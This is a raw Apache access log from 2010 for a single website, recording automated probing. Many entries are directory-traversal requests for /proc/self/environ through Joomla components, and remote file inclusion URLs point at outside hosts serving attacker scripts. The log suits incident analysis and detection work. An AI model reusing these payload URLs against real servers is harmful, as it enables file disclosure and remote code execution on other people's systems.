174.120.226.226 - - [02/Sep/2010:11:58:19 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.834" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:58:24 -0700] "GET /logs/access_100728.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:58:26 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:58:27 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:59:05 -0700] "GET /logs/access_080515.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:55 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:55 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:55 -0700] "POST /logs/access_080506.log//contact.php HTTP/1.0" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:55 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:55 -0700] "POST /logs/access_080506.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:56 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:56 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:57 -0700] "POST /logs/access_080506.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:57 -0700] "POST /logs/access_080506.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:58 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:59:58 -0700] "POST /logs/access_080506.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
220.181.125.68 - - [02/Sep/2010:12:00:19 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "-" "www.dmulk.com"
220.181.125.68 - - [02/Sep/2010:12:00:31 -0700] "GET / HTTP/1.0" 200 68310 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:00:57 -0700] "GET /logs/access_100806.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:12:01:01 -0700] "GET /logs/access_100516.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:01:02 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:12:01:05 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:01:08 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
110.45.146.84 - - [02/Sep/2010:12:01:17 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68601 "-" "libwww-perl/5.79" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:01:23 -0700] "GET /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:01:23 -0700] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:01:24 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:01:29 -0700] "GET /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:01:42 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:01:47 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
89.202.127.4 - - [02/Sep/2010:12:01:53 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:03 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:08 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:02:09 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:02:09 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:14 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:24 -0700] "GET /logs/access_100608.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:25 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:26 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:02:26 -0700] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:02:26 -0700] "GET /logs/access_100115.log//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:26 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:27 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:12:02:37 -0700] "POST /logs/access_100723.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:12:02:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:38 -0700] "GET /logs/access_100621.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:40 -0700] "GET /logs/access_100621.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:42 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:43 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:02:44 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:02:56 -0700] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:02:59 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 68445 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:02:59 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:03:02 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:12:03:02 -0700] "GET /logs/access_091012.log%20%20//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:03:04 -0700] "GET /logs/access_100608.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:03:04 -0700] "GET /logs/access_090506.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:03:08 -0700] "GET /logs/access_081027.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:03:15 -0700] "GET /logs/access_100621.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:03:16 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:03:18 -0700] "GET /logs/access_100621.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:03:19 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:03:19 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:03:34 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:03:35 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:04:00 -0700] "GET /logs/access_100715.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:04:02 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:04:03 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
61.100.181.217 - - [02/Sep/2010:12:04:11 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68601 "-" "libwww-perl/5.79" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:04:16 -0700] "GET /logs/access_100715.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:04:17 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.190.241.102 - - [02/Sep/2010:12:04:18 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:04:24 -0700] "GET /logs/access_090405.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:08 -0700] "GET /logs/access_100608.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:08 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:08 -0700] "GET /logs/access_100608.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:08 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:09 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:09 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:42 -0700] "GET /logs/access_100715.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:43 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:05:43 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:05:49 -0700] "GET /logs/access_080515.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:06:00 -0700] "GET /logs/access_100715.log/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:06:00 -0700] "GET /index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.819" "www.dmulk.com"
67.210.123.45 - - [02/Sep/2010:12:06:00 -0700] "GET /logs/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:44 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:44 -0700] "GET /logs/access_080218.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:44 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:44 -0700] "GET /logs/access_080218.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:45 -0700] "GET /logs/access_081006.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:45 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:46 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:46 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:47 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:47 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:48 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:48 -0700] "GET /logs/access_080820.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:49 -0700] "GET /logs/access_081006.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:06:49 -0700] "GET /logs/access_080820.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:12:06:52 -0700] "POST /logs/access_090320.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:12:06:52 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:12:06:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:07:20 -0700] "GET /logs/access_081026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:12:07:39 -0700] "POST /logs/access_090320.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:12:07:39 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:12:07:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:08:09 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:08:10 -0700] "GET /logs/access_091224.log%20%20//e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:08:10 -0700] "GET /e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:08:20 -0700] "GET /logs/access_080709.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:08:45 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:08:48 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
